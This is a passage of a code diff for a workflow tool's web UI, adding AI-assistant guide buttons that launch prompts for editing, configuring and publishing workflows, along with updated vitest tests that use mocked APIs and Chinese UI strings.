-          <span className="font-medium text-gray-700">{t('detail.chat.welcome.mdTabLabel')}</span>
-          {t('detail.chat.welcome.descPart2')}
-        </p>
-      </div>
-
-      <div className="rounded-lg border border-gray-100 bg-gray-50 p-3 space-y-2">
-        <div className="flex items-center gap-1.5 text-[10px] font-medium text-gray-400 uppercase tracking-wide">
-          <FolderOpen className="w-3 h-3" />
-          {t('detail.chat.welcome.fileDir')}
-        </div>
-        <div className="font-mono text-[11px] text-gray-600 space-y-1">
-          <p className="text-gray-500">{workflowDir}</p>
-          <p className="pl-3">
-            ├── <span className="text-red-600">workflow.md</span>
-            {!workflow.markdownContent && (
-              <span className="text-gray-400 ml-1">{t('detail.chat.welcome.notGenerated')}</span>
-            )}
+    <div className="flex min-h-[420px] w-full flex-col items-center justify-center px-5 py-8">
+      <p className="mb-8 text-center text-sm font-medium text-gray-400">
+        {t('detail.run.noHistory')}
+      </p>
+      <div className="flex max-h-[min(560px,calc(100vh-260px))] w-full max-w-[420px] flex-col overflow-hidden rounded-xl border border-gray-200 bg-white px-5 py-5 text-center shadow-sm">
+        <div className="flex-shrink-0">
+          <div className="mx-auto flex h-11 w-11 items-center justify-center rounded-xl border border-red-100 bg-red-50 text-red-500">
+            <Bot className="h-5 w-5" />
+          </div>
+          <h3 className="mt-4 text-sm font-semibold text-gray-900">
+            {t('detail.chat.welcome.editPanelTitle')}
+          </h3>
+          <p className="mx-auto mt-2 max-w-[320px] text-xs leading-relaxed text-gray-500">
+            {t('detail.chat.welcome.editPanelDesc', { name: workflowDisplayName })}
           </p>
-          <p className="pl-3">└── <span className="text-amber-600">workflow.json</span></p>
         </div>
-      </div>
-
-      <div className="rounded-lg border border-red-100 bg-red-50 p-3 text-xs text-red-800 space-y-1.5 leading-relaxed">
-        <p className="font-medium">{t('detail.chat.welcome.canHelp')}</p>
-        <ul className="space-y-1 text-red-700">
-          <li>• {t('detail.chat.welcome.bullet1')}</li>
-          <li>• {t('detail.chat.welcome.bullet2')}</li>
-          <li>• {t('detail.chat.welcome.bullet3')}</li>
-          <li>• {t('detail.chat.welcome.bullet4')}</li>
-        </ul>
-        <p className="pt-1 text-red-600 border-t border-red-200">
-          {t('detail.chat.welcome.tipPart1')}<span className="font-medium">{t('detail.chat.welcome.mdTabLabel')}</span>
-          {t('detail.chat.welcome.tipPart2')}
-        </p>
+        <div
+          data-testid="workflow-edit-guide-scroll"
+          className="mt-4 min-h-0 space-y-4 overflow-y-auto pr-1 text-left [scrollbar-width:thin] [scrollbar-color:#e4e4e7_transparent]"
+        >
+          <WorkflowGuideSection
+            title={t('detail.chat.welcome.editSectionTitle')}
+            actions={guideGroups.editActions}
+            onStartPrompt={onStartPrompt}
+          />
+          <WorkflowGuideSection
+            title={t('detail.chat.welcome.configSectionTitle')}
+            actions={guideGroups.configActions}
+            onStartPrompt={onStartPrompt}
+          />
+          <WorkflowGuideSection
+            title={t('detail.chat.welcome.publishSectionTitle')}
+            actions={guideGroups.publishActions}
+            onStartPrompt={onStartPrompt}
+          />
+        </div>
       </div>
 
       {error && (
-        <div className="flex items-center gap-2 text-xs text-red-600 bg-red-50 border border-red-200 rounded-lg px-3 py-2">
+        <div className="mt-4 flex w-full max-w-[420px] items-center gap-2 rounded-lg border border-red-200 bg-red-50 px-3 py-2 text-xs text-red-600">
           <AlertCircle className="w-4 h-4 flex-shrink-0" />
           <span className="flex-1">{error}</span>
           <button onClick={onRetry} className="underline hover:no-underline flex-shrink-0">
@@ -415,3 +600,317 @@ function WorkflowWelcome({
     </div>
   );
 }
+
+function WorkflowGuideSection({
+  title,
+  actions,
+  onStartPrompt,
+}: {
+  title: string;
+  actions: ChatGuideAction[];
+  onStartPrompt: (prompt: string, label: string) => void;
+}) {
+  if (actions.length === 0) return null;
+
+  return (
+    <section>
+      <h4 className="mb-2 text-[11px] font-semibold text-gray-400">{title}</h4>
+      <div className="flex flex-col gap-1.5">
+        {actions.map((action) => (
+          <div
+            key={action.label}
+            className="group flex h-8 w-full items-center justify-between gap-3 rounded-lg border border-gray-200 bg-white px-3 text-left text-xs font-semibold text-gray-700 transition-colors hover:border-rose-200 hover:bg-rose-50/70 hover:text-rose-600"
+          >
+            <button
+              type="button"
+              onClick={() => onStartPrompt(action.prompt, action.label)}
+              className="min-w-0 flex-1 truncate text-left"
+            >
+              {action.label}
+            </button>
+            <GuideInfoIcon
+              label={action.label}
+              description={action.description}
+              className="group-hover:text-rose-400"
+            />
+          </div>
+        ))}
+      </div>
+    </section>
+  );
+}
+
+function WorkflowLaunchRequestRunner({
+  launchRequest,
+  enabled,
+  onLaunchRequestHandled,
+  onStartPrompt,
+}: {
+  launchRequest?: WorkflowChatLaunchRequest | null;
+  enabled: boolean;
+  onLaunchRequestHandled?: (id: number) => void;
+  onStartPrompt: (text: string, label?: string) => void;
+}) {
+  const handledLaunchRequestRef = useRef<number | null>(null);
+
+  useEffect(() => {
+    if (!enabled || !launchRequest || handledLaunchRequestRef.current === launchRequest.id) return;
+    handledLaunchRequestRef.current = launchRequest.id;
+    onStartPrompt(launchRequest.prompt, launchRequest.displayLabel);
+    onLaunchRequestHandled?.(launchRequest.id);
+  }, [enabled, launchRequest, onLaunchRequestHandled, onStartPrompt]);
+
+  return null;
+}
+
+function buildWorkflowPromptParams(workflow: Workflow) {
+  const workflowDir = workflow.source === 'global'
+    ? `~/.flocks/plugins/workflows/${workflow.id}/`
+    : `.flocks/plugins/workflows/${workflow.id}/`;
+  const workflowMdPath = `${workflowDir}workflow.md`;
+  const workflowGuidePath = `${workflowDir}${WORKFLOW_GUIDE_FILE_NAME}`;
+  const endpoints = workflowAPIEndpoints(workflow.id);
+  return {
+    id: workflow.id,
+    name: workflow.name,
+    dir: workflowDir,
+    mdPath: workflowMdPath,
+    guidePath: workflowGuidePath,
+    configEndpoint: endpoints.config.read.replace(/^GET /, ''),
+    configSyncEndpoint: endpoints.config.syncFallback.replace(/^POST /, ''),
+    publishEndpoint: endpoints.apiService.publish.replace(/^POST /, ''),
+    unpublishEndpoint: endpoints.apiService.unpublish.replace(/^POST /, ''),
+    triggersEndpoint: endpoints.triggers.list.replace(/^GET /, ''),
+    apiEndpoints: formatWorkflowAPIEndpoints(workflow.id),
+    configSkillName: WORKFLOW_CONFIG_SKILL_NAME,
+  };
+}
+
+function buildWorkflowGuideQuestionPrompt(
+  t: TranslateFn,
+  workflow: Workflow,
+  focus: string,
+  instruction: string,
+): string {
+  const promptParams = withBackendConfigAccessGuide(t, buildWorkflowPromptParams(workflow));
+  return [
+    t(
+      'detail.chat.welcome.guideQuestionPrompt',
+      {
+        ...promptParams,
+        focus,
+        instruction,
+      },
+    ),
+    promptParams.backendConfigAccessGuide,
+  ].join('\n\n');
+}
+
+function buildWorkflowEditActions(t: TranslateFn, workflow: Workflow): ChatGuideAction[] {
+  const promptParams = buildWorkflowPromptParams(workflow);
+  const group = t('detail.chat.welcome.editSectionTitle');
+  return [
+    {
+      label: t('detail.chat.welcome.editRequirementShort'),
+      description: t('detail.chat.welcome.editRequirementDesc'),
+      prompt: t('detail.chat.welcome.editRequirementPrompt', promptParams),
+      group,
+    },
+    {
+      label: t('detail.chat.welcome.editNodeFunctionShort'),
+      description: t('detail.chat.welcome.editNodeFunctionDesc'),
+      prompt: t('detail.chat.welcome.editNodeFunctionPrompt', promptParams),
+      group,
+    },
+    {
+      label: t('detail.chat.welcome.editNodeShort'),
+      description: t('detail.chat.welcome.editNodeDesc'),
+      prompt: t('detail.chat.welcome.editNodePrompt', promptParams),
+      group,
+    },
+    {
+      label: t('detail.chat.welcome.editFlowShort'),
+      description: t('detail.chat.welcome.editFlowDesc'),
+      prompt: t('detail.chat.welcome.editFlowPrompt', promptParams),
+      group,
+    },
+    {
+      label: t('detail.chat.welcome.editRegenerateShort'),
+      description: t('detail.chat.welcome.editRegenerateDesc'),
+      prompt: t('detail.chat.welcome.editRegeneratePrompt', promptParams),
+      group,
+    },
+  ];
+}
+
+function buildWorkflowConfigActions(t: TranslateFn, workflow: Workflow): ChatGuideAction[] {
+  const promptParams = withBackendConfigAccessGuide(t, buildWorkflowPromptParams(workflow));
+  const group = t('detail.chat.welcome.configSectionTitle');
+  const buildQuestionPrompt = (focus: string, instruction: string) => (
+    buildWorkflowGuideQuestionPrompt(t, workflow, focus, instruction)
+  );
+  return [
+    {
+      label: t('detail.chat.welcome.guidePrimaryShort'),
+      description: t('detail.chat.welcome.guidePrimaryDesc'),
+      prompt: [
+        t('detail.chat.welcome.guidePrompt', promptParams),
+        promptParams.backendConfigAccessGuide,
+      ].join('\n\n'),
+      group,
+    },
+    {
+      label: t('detail.chat.welcome.guideInputModeShort'),
+      description: t('detail.chat.welcome.guideInputModeDesc'),
+      prompt: buildQuestionPrompt(
+        t('detail.chat.welcome.guideInputModeShort'),
+        t('detail.chat.welcome.guideInputModeInstruction'),
+      ),
+      group,
+    },
+    {
+      label: t('detail.chat.welcome.guideSourceShapeShort'),
+      description: t('detail.chat.welcome.guideSourceShapeDesc'),
+      prompt: buildQuestionPrompt(
+        t('detail.chat.welcome.guideSourceShapeShort'),
+        t('detail.chat.welcome.guideSourceShapeInstruction'),
+      ),
+      group,
+    },
+    {
+      label: t('detail.chat.welcome.guideOutputShort'),
+      description: t('detail.chat.welcome.guideOutputDesc'),
+      prompt: buildQuestionPrompt(
+        t('detail.chat.welcome.guideOutputShort'),
+        t('detail.chat.welcome.guideOutputInstruction'),
+      ),
+      group,
+    },
+    {
+      label: t('detail.chat.welcome.guideFilterShort'),
+      description: t('detail.chat.welcome.guideFilterDesc'),
+      prompt: buildQuestionPrompt(
+        t('detail.chat.welcome.guideFilterShort'),
+        t('detail.chat.welcome.guideFilterInstruction'),
+      ),
+      group,
+    },
+    {
+      label: t('detail.chat.welcome.guideSampleShort'),
+      description: t('detail.chat.welcome.guideSampleDesc'),
+      prompt: buildQuestionPrompt(
+        t('detail.chat.welcome.guideSampleShort'),
+        t('detail.chat.welcome.guideSampleInstruction'),
+      ),
+      group,
+    },
+    {
+      label: t('detail.chat.welcome.guideApplyShort'),
+      description: t('detail.chat.welcome.guideApplyDesc'),
+      prompt: buildQuestionPrompt(
+        t('detail.chat.welcome.guideApplyShort'),
+        t('detail.chat.welcome.guideApplyInstruction'),
+      ),
+      group,
+    },
+    {
+      label: t('detail.chat.welcome.guideAuditShort'),
+      description: t('detail.chat.welcome.guideAuditDesc'),
+      prompt: t('detail.chat.welcome.auditPrompt', promptParams),
+      group,
+    },
+  ];
+}
+
+function buildWorkflowPublishActions(t: TranslateFn, workflow: Workflow): ChatGuideAction[] {
+  const group = t('detail.chat.welcome.publishSectionTitle');
+  const buildQuestionPrompt = (focus: string, instruction: string) => (
+    buildWorkflowGuideQuestionPrompt(t, workflow, focus, instruction)
+  );
+  return [
+    {
+      label: t('detail.run.guideApiShort'),
+      description: t('detail.run.guideApiDesc'),
+      prompt: buildQuestionPrompt(
+        t('detail.run.guideApiShort'),
+        t('detail.run.guideApiInstruction'),
+      ),
+      group,
+    },
+    {
+      label: t('detail.run.guideSyslogShort'),
+      description: t('detail.run.guideSyslogDesc'),
+      prompt: buildQuestionPrompt(
+        t('detail.run.guideSyslogShort'),
+        t('detail.run.guideSyslogInstruction'),
+      ),
+      group,
+    },
+    {
+      label: t('detail.run.guideKafkaShort'),
+      description: t('detail.run.guideKafkaDesc'),
+      prompt: buildQuestionPrompt(
+        t('detail.run.guideKafkaShort'),
+        t('detail.run.guideKafkaInstruction'),
+      ),
+      group,
+    },
+    {
+      label: t('detail.run.guideWebhookShort'),
+      description: t('detail.run.guideWebhookDesc'),
+      prompt: buildQuestionPrompt(
+        t('detail.run.guideWebhookShort'),
+        t('detail.run.guideWebhookInstruction'),
+      ),
+      group,
+    },
+    {
+      label: t('detail.run.guideScheduleShort'),
+      description: t('detail.run.guideScheduleDesc'),
+      prompt: buildQuestionPrompt(
+        t('detail.run.guideScheduleShort'),
+        t('detail.run.guideScheduleInstruction'),
+      ),
+      group,
+    },
+  ];
+}
+
+function buildWorkflowGuideGroups(t: TranslateFn, workflow: Workflow) {
+  const editActions = buildWorkflowEditActions(t, workflow);
+  const configActions = buildWorkflowConfigActions(t, workflow);
+  const publishActions = buildWorkflowPublishActions(t, workflow);
+  return {
+    editActions,
+    configActions,
+    publishActions,
+    allActions: [...editActions, ...configActions, ...publishActions],
+  };
+}
+
+function WorkflowGuideDock({
+  workflow,
+  disabled,
+  onStartPrompt,
+}: {
+  workflow: Workflow;
+  disabled?: boolean;
+  onStartPrompt: (text: string, label: string) => void;
+}) {
+  const { t } = useTranslation('workflow');
+  const guideActions = buildWorkflowGuideGroups(t, workflow).allActions;
+
+  return (
+    <ChatGuideDock
+      actions={guideActions}
+      disabled={disabled}
+      collapseTitle={t('detail.chat.welcome.guideCollapse')}
+      expandTitle={t('detail.chat.welcome.guideExpand')}
+      onStartPrompt={onStartPrompt}
+    />
+  );
+}
+
+// ─────────────────────────────────────────────
+// Helpers
+// ─────────────────────────────────────────────
diff --git a/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.test.tsx b/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.test.tsx
index 72390d8c8..31756100f 100644
--- a/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.test.tsx
+++ b/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.test.tsx
@@ -1,25 +1,74 @@
 import { describe, it, expect, vi, beforeEach } from 'vitest';
-import { fireEvent, render, screen, waitFor } from '@testing-library/react';
+import { render, screen, waitFor, within } from '@testing-library/react';
 import userEvent from '@testing-library/user-event';
 import IntegrationTab from './IntegrationTab';
 
-const { workflowAPI } = vi.hoisted(() => ({
+const { workflowAPI, workflowAPIEndpoints } = vi.hoisted(() => ({
   workflowAPI: {
     get: vi.fn(),
+    getConfig: vi.fn(),
+    updateConfig: vi.fn(),
     getService: vi.fn(),
+    deleteService: vi.fn(),
     publish: vi.fn(),
     unpublish: vi.fn(),
+    syncConfig: vi.fn(),
     getTriggers: vi.fn(),
     createTrigger: vi.fn(),
     updateTrigger: vi.fn(),
     deleteTrigger: vi.fn(),
     listTriggerPlugins: vi.fn(),
     runPollerOnce: vi.fn(),
+    saveSyslogConfig: vi.fn(),
+    getSyslogStatus: vi.fn(),
+    saveKafkaConfig: vi.fn(),
+    getKafkaStatus: vi.fn(),
+    savePollerConfig: vi.fn(),
+    getPollerStatus: vi.fn(),
+  },
+  workflowAPIEndpoints: (id: string, triggerId = '{triggerId}') => {
+    const workflowBase = `/api/workflow/${id}`;
+    const triggerBase = `${workflowBase}/triggers`;
+    const triggerRecord = `${triggerBase}/${triggerId}`;
+    return {
+      config: {
+        read: `GET ${workflowBase}/config`,
+        write: `PUT ${workflowBase}/config`,
+        syncFallback: `POST ${workflowBase}/config/sync`,
+      },
+      apiService: {
+        read: `GET ${workflowBase}/service`,
+        publish: `POST ${workflowBase}/publish`,
+        unpublish: `POST ${workflowBase}/unpublish`,
+        delete: `DELETE ${workflowBase}/service`,
+      },
+      triggers: {
+        list: `GET ${triggerBase}`,
+        create: `POST ${triggerBase}`,
+        update: `PUT ${triggerRecord}`,
+        delete: `DELETE ${triggerRecord}`,
+        status: `GET ${triggerRecord}/status`,
+        previewMapping: `POST ${triggerRecord}/preview-mapping`,
+        test: `POST ${triggerRecord}/test`,
+        invokeWebhook: `/webhook/workflows/${id}/${triggerId}`,
+        plugins: 'GET /api/workflow-trigger-plugins',
+      },
+      legacyAdapters: {
+        kafkaConfig: `GET/POST ${workflowBase}/kafka-config`,
+        kafkaStatus: `GET ${workflowBase}/kafka-status`,
+        pollerConfig: `GET/POST ${workflowBase}/poller-config`,
+        pollerStatus: `GET ${workflowBase}/poller-status`,
+        pollerRunOnce: `POST ${workflowBase}/poller-run-once`,
+        syslogConfig: `GET/POST ${workflowBase}/syslog-config`,
+        syslogStatus: `GET ${workflowBase}/syslog-status`,
+      },
+    };
   },
 }));
 
 vi.mock('@/api/workflow', () => ({
   workflowAPI,
+  workflowAPIEndpoints,
 }));
 
 vi.mock('@/components/common/CopyButton', () => ({
@@ -36,23 +85,58 @@ vi.mock('@/components/common/WorkflowStatusBadge', () => ({
 
 vi.mock('react-i18next', () => ({
   useTranslation: () => ({
-    t: (key: string) => {
+    t: (key: string, params?: Record<string, unknown>) => {
       const translations: Record<string, string> = {
         'detail.run.publishSection': '发布为 API',
         'detail.run.publishDesc': 'publish desc',
         'detail.run.publishAsApi': '发布为 API 服务',
+        'detail.run.triggerSection': '触发能力',
         'detail.run.publishFailed': '发布失败',
+        'detail.run.publishing': '发布中，请稍候...',
         'detail.run.stopFailed': '停止失败',
         'detail.run.stopping': '停止中...',
         'detail.run.stopService': '停止服务',
+        'detail.run.deleteService': '删除 API 发布配置',
+        'detail.run.deleteServiceShort': '删除配置',
+        'detail.run.deletingService': '删除中...',
+        'detail.run.deleteServiceConfirm': '确认删除 API 发布配置？',
+        'detail.run.deleteServiceFailed': '删除 API 发布配置失败',
         'detail.run.driverLocal': '本地进程',
         'detail.run.driverDocker': 'Docker 容器',
+        'detail.run.applyDriver': '应用运行方式',
         'detail.run.driverLocalDesc': 'local desc',
         'detail.run.driverDockerDesc': 'docker desc',
         'detail.run.apiKeyHide': '隐藏',
         'detail.run.apiKeyShow': '显示',
+        'detail.chat.backendConfigAccessGuide': '后端配置库认证方式：使用 server_api_token，并通过 Authorization: Bearer 访问 {{configEndpoint}}；兜底迁移接口是 {{configSyncEndpoint}}。',
+        'detail.run.guidePanelTitle': 'Rex 辅助发布',
+        'detail.run.guidePanelDesc': '选择一种发布方式',
+        'detail.run.cardGuideTitle': 'Flocks辅助配置',
+        'detail.run.cardGuideAction': '辅助配置',
+        'detail.run.cardGuideApiFocus': 'API 发布配置',
+        'detail.run.cardGuideApiDesc': '结合当前 API 服务状态、运行方式和工作流功能，引导确认发布、鉴权、调用样例和是否启动。',
+        'detail.run.cardGuideTriggerDesc': '结合当前 {{trigger}} 卡片配置和工作流功能，引导确认接入参数、字段映射、样例和生效方式。',
+        'detail.run.cardGuideDisplayLabel': 'Flocks辅助配置：{{focus}}',
+        'detail.run.guideApiShort': '发布为 API',
+        'detail.run.guideApiDesc': '配置 API 发布',
+        'detail.run.guideApiInstruction': '围绕 API 发布读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideSyslogShort': 'Syslog 接入',
+        'detail.run.guideSyslogDesc': '配置 Syslog 接入',
+        'detail.run.guideSyslogInstruction': '围绕 Syslog 接入读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideKafkaShort': 'Kafka 接入',
+        'detail.run.guideKafkaDesc': '配置 Kafka 接入',
+        'detail.run.guideKafkaInstruction': '围绕 Kafka 接入读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideWebhookShort': 'Webhook 接入',
+        'detail.run.guideWebhookDesc': '配置 Webhook 接入',
+        'detail.run.guideWebhookInstruction': '围绕 Webhook 接入读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideScheduleShort': '定时触发',
+        'detail.run.guideScheduleDesc': '配置定时触发',
+        'detail.run.guideScheduleInstruction': '围绕定时触发读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.chat.welcome.guideQuestionPrompt': '用户点击了「{{focus}}」按钮。这个按钮的意图是：{{instruction}} 工作流 ID 是 {{id}}，工作流目录是 {{dir}}，工作流配置引导文件是 {{guidePath}}。配置模板接口是 {{configEndpoint}}。前端当前 API 清单：{{apiEndpoints}}。第一步必须读取 {{guidePath}}，必须调用 question 工具。',
       };
-      return translations[key] ?? key;
+      return (translations[key] ?? key).replace(/{{(\w+)}}/g, (_match, name: string) => (
+        params?.[name] === undefined ? '' : String(params[name])
+      ));
     },
   }),
 }));
@@ -83,20 +167,35 @@ const workflow = {
 };
 
 describe('IntegrationTab trigger workspace', () => {
-  const getFieldTextarea = (label: string): HTMLTextAreaElement => {
-    const field = screen.getByText(label).closest('div');
-    const textarea = field?.querySelector('textarea');
-    if (!(textarea instanceof HTMLTextAreaElement)) {
-      throw new Error(`textarea not found for field: ${label}`);
-    }
-    return textarea;
-  };
-
   beforeEach(() => {
     vi.clearAllMocks();
     vi.stubGlobal('confirm', vi.fn(() => true));
     workflowAPI.get.mockResolvedValue({ data: workflow });
+    workflowAPI.getConfig.mockResolvedValue({ data: { exists: false, path: '/tmp/config.json', config: {} } });
+    workflowAPI.updateConfig.mockImplementation(async (_id: string, config: unknown) => ({
+      data: {
+        ok: true,
+        exists: true,
+        path: '/tmp/config.json',
+        config,
+      },
+    }));
     workflowAPI.getService.mockResolvedValue({ data: null });
+    workflowAPI.deleteService.mockResolvedValue({ data: { ok: true, workflowId: 'wf-1' } });
+    workflowAPI.publish.mockResolvedValue({
+      data: {
+        workflowId: 'wf-1',
+        workflowName: 'Demo Workflow',
+        serviceUrl: 'http://127.0.0.1:8080',
+        invokeUrl: 'http://127.0.0.1:8080/invoke',
+        apiKey: 'secret',
+        status: 'running',
+        publishedAt: Date.now(),
+        driver: 'local',
+      },
+    });
+    workflowAPI.unpublish.mockResolvedValue({ data: { ok: true } });
+    workflowAPI.syncConfig.mockResolvedValue({ data: { ok: true, path: '/tmp/config.json', config: {} } });
     workflowAPI.getTriggers.mockResolvedValue({ data: [] });
     workflowAPI.createTrigger.mockResolvedValue({ data: { trigger: { id: 'hook-created' } } });
     workflowAPI.updateTrigger.mockImplementation(async (_workflowId: string, _triggerId: string, trigger: unknown) => ({
@@ -105,288 +204,473 @@ describe('IntegrationTab trigger workspace', () => {
     workflowAPI.deleteTrigger.mockResolvedValue({ data: { ok: true, triggerId: 'hook-1' } });
     workflowAPI.listTriggerPlugins.mockResolvedValue({ data: [] });
     workflowAPI.runPollerOnce.mockResolvedValue({ data: { ok: true, status: { state: 'running' } } });
+    workflowAPI.saveSyslogConfig.mockResolvedValue({ data: { ok: true, listener: { state: 'listening' } } });
+    workflowAPI.getSyslogStatus.mockResolvedValue({ data: { state: 'stopped' } });
+    workflowAPI.saveKafkaConfig.mockResolvedValue({ data: { ok: true, consumer: { state: 'running' } } });
+    workflowAPI.getKafkaStatus.mockResolvedValue({ data: { state: 'stopped' } });
+    workflowAPI.savePollerConfig.mockResolvedValue({ data: { ok: true, status: { state: 'running' } } });
+    workflowAPI.getPollerStatus.mockResolvedValue({ data: { state: 'stopped' } });
   });
 
-  it('renders publish section first and unified trigger workspace below', async () => {
-    render(<IntegrationTab workflow={workflow} />);
-
-    expect(await screen.findByText('发布为 API')).toBeInTheDocument();
-    expect(await screen.findByText('集成')).toBeInTheDocument();
+  it('renders guide with persistent API and trigger workspaces when no runtime records exist', async () => {
+    const onGuidePrompt = vi.fn();
+    render(<IntegrationTab workflow={workflow} onGuidePrompt={onGuidePrompt} />);
+
+    const apiCard = await screen.findByTestId('api-publish-card');
+    const guideActions = screen.getByTestId('publish-guide-actions-inline');
+    expect(screen.getByText('Rex 辅助发布')).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /发布为 API/ })).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /Syslog 接入/ })).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /Kafka 接入/ })).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /Webhook 接入/ })).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /定时触发/ })).toBeInTheDocument();
+    expect(workflowAPI.getConfig).toHaveBeenCalledWith('wf-1');
+    expect(workflowAPI.syncConfig).not.toHaveBeenCalled();
+    expect(within(apiCard).getByRole('button', { name: '发布' })).toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: '发布为 API 服务' })).not.toBeInTheDocument();
+    expect(screen.getByText('触发能力')).toBeInTheDocument();
+    expect(screen.getByText('还没有配置任何 Trigger。可以从上面的快捷按钮开始。')).toBeInTheDocument();
     expect(screen.queryByText('Kafka 配置')).not.toBeInTheDocument();
     expect(screen.queryByText('Workflow Poller')).not.toBeInTheDocument();
   });
 
-  it('shows only one empty-state box when there is no trigger', async () => {
-    render(<IntegrationTab workflow={workflow} />);
-
-    expect(await screen.findByText('还没有配置任何 Trigger。可以从上面的快捷按钮开始。')).toBeInTheDocument();
-    expect(screen.queryByText('选择或创建一个 Trigger 后，在这里编辑配置。')).not.toBeInTheDocument();
-    expect(screen.getByRole('button', { name: 'Schedule' })).toBeEnabled();
-    expect(screen.getByRole('button', { name: 'Webhook' })).toBeEnabled();
-    expect(screen.getByRole('button', { name: 'Syslog' })).toBeEnabled();
-    expect(screen.getByRole('button', { name: 'Kafka' })).toBeEnabled();
-    expect(screen.queryByRole('button', { name: 'Custom Adapter' })).not.toBeInTheDocument();
-    expect(screen.queryByRole('button', { name: '刷新' })).not.toBeInTheDocument();
-  });
-
-  it('renders trigger list in the unified workspace', async () => {
-    workflowAPI.getTriggers.mockResolvedValue({
-      data: [
-        {
-          trigger: {
-            id: 'schedule-1',
-            name: 'Daily Scan',
-            type: 'schedule',
-            enabled: true,
-            source: { intervalSeconds: 60 },
-            mapping: {},
-            inputs: {},
-            testSamples: [{ name: 'default', payload: {} }],
-          },
-          status: { state: 'running' },
+  it('renders runtime publish and trigger records with delete actions below the Rex guide', async () => {
+    const user = userEvent.setup();
+    const service = {
+      workflowId: 'wf-1',
+      workflowName: 'Demo Workflow',
+      serviceUrl: 'http://127.0.0.1:8080',
+      invokeUrl: 'http://127.0.0.1:8080/invoke',
+      apiKey: 'secret',
+      status: 'stopped' as const,
+      publishedAt: Date.now(),
+      driver: 'local' as const,
+    };
+    const triggerRecord = {
+      trigger: {
+        id: 'syslog-default',
+        type: 'syslog' as const,
+        name: 'Syslog Listener',
+        enabled: false,
+        source: { protocol: 'udp', host: '0.0.0.0', port: 5140, format: 'auto' },
+        auth: { type: 'api_key', headerName: 'X-Api-Key', apiKey: 'super-secret-api-key' },
+        mapping: { syslog_message: '$.body' },
+      },
+      status: { state: 'stopped' },
+    };
+    workflowAPI.getService.mockResolvedValue({ data: service });
+    workflowAPI.getTriggers.mockResolvedValue({ data: [triggerRecord] });
+    workflowAPI.getConfig.mockResolvedValue({
+      data: {
+        exists: false,
+        path: '/tmp/config.json',
+        source: 'generated',
+        config: {
+          version: 1,
+          kind: 'workflow.integration-config',
+          workflow: { id: 'wf-1' },
+          updatedAt: Date.now(),
+          publish: { type: 'api_service', enabled: false, driver: 'local' },
+          triggers: [
+            {
+              id: 'syslog-default',
+              type: 'syslog',
+              name: 'Syslog Listener',
+              source: { protocol: 'udp', host: '0.0.0.0', port: 5140, format: 'auto' },
+              mapping: { syslog_message: '$.body' },
+            },
+          ],
         },
-      ],
-    });
-
-    render(<IntegrationTab workflow={workflow} />);
-
-    expect((await screen.findAllByText('Daily Scan')).length).toBeGreaterThan(0);
-    expect(screen.getByText('Inputs（JSON）')).toBeInTheDocument();
-    expect(screen.queryByText('Mapping（JSON）')).not.toBeInTheDocument();
-    expect(screen.queryByText('Filter Expr')).not.toBeInTheDocument();
-    expect(screen.queryByText('测试样例')).not.toBeInTheDocument();
-  });
-
-  it('does not render duplicated trigger card when only one trigger exists', async () => {
-    workflowAPI.getTriggers.mockResolvedValue({
-      data: [
-        {
-          trigger: {
-            id: 'kafka-1',
-            name: 'Kafka Trigger',
-            type: 'kafka',
+        runtime: {
+          publish: {
+            type: 'api_service',
             enabled: false,
-            source: {
-              inputBroker: 'localhost:9092',
-              inputTopic: 'wf-1.events',
-              inputGroupId: 'wf-1-group',
-            },
-            mapping: {},
-            inputs: {},
-            testSamples: [],
+            status: 'stopped',
+            driver: 'local',
+            invokeUrl: 'http://127.0.0.1:8080/invoke',
+            apiKeyConfigured: true,
+            publishedAt: service.publishedAt,
           },
-          status: { state: 'stopped' },
+          triggers: [triggerRecord],
         },
-      ],
+      },
     });
 
-    render(<IntegrationTab workflow={workflow} />);
+    const onGuidePrompt = vi.fn();
+    render(<IntegrationTab workflow={workflow} onGuidePrompt={onGuidePrompt} />);
+
+    const guideActions = await screen.findByTestId('publish-guide-actions-inline');
+    const apiCard = await screen.findByTestId('api-publish-card');
+    expect(Boolean(guideActions.compareDocumentPosition(apiCard) & Node.DOCUMENT_POSITION_FOLLOWING)).toBe(true);
+    expect(within(apiCard).getByRole('button', { name: '启用' })).toBeInTheDocument();
+    expect(within(apiCard).getByRole('button', { name: '删除 API 发布配置' })).toBeInTheDocument();
+    expect(within(apiCard).queryByTestId('api-publish-config')).not.toBeInTheDocument();
+    await user.click(within(apiCard).getByRole('button', { name: '配置' }));
+    expect(within(apiCard).getByTestId('api-publish-config')).toBeInTheDocument();
+    expect(within(apiCard).getByRole('button', { name: '本地进程' })).toBeInTheDocument();
+    expect(within(apiCard).getByRole('button', { name: 'Docker 容器' })).toBeInTheDocument();
+    expect(within(apiCard).getByText('Flocks辅助配置')).toBeInTheDocument();
+    await user.click(within(apiCard).getByRole('button', { name: '辅助配置' }));
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('当前发布卡片上下文'),
+      'Flocks辅助配置：API 发布配置',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('"selectedDriver": "local"'),
+      'Flocks辅助配置：API 发布配置',
+    );
